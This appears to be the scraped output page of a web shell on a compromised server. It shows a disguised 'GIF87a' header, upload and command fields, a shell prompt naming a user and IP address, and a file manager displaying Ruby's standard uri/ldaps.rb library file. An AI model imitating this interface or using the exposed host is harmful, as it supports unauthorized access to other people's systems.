GIF87a; 404

MY HEART




Upload:

Command:

diavoloapp@18.191.102.140: ~ $
# = uri/ldap.rb
#
# License:: You can redistribute it and/or modify it under the same term as Ruby.
#
# See URI for general documentation
#

require 'uri/ldap'

module URI

  # The default port for LDAPS URIs is 636, and the scheme is 'ldaps:' rather
  # than 'ldap:'. Other than that, LDAPS URIs are identical to LDAP URIs;
  # see URI::LDAP.
  class LDAPS < LDAP
    # A Default port of 636 for URI::LDAPS
    DEFAULT_PORT = 636
  end
  @@schemes['LDAPS'] = LDAPS
end

Filemanager

Name Type Size Permission Actions
common.rb File 28.93 KB 0644
ftp.rb File 6.66 KB 0644
generic.rb File 38.18 KB 0644
http.rb File 2.75 KB 0644
https.rb File 581 B 0644
ldap.rb File 5.74 KB 0644
ldaps.rb File 470 B 0644
mailto.rb File 7.05 KB 0644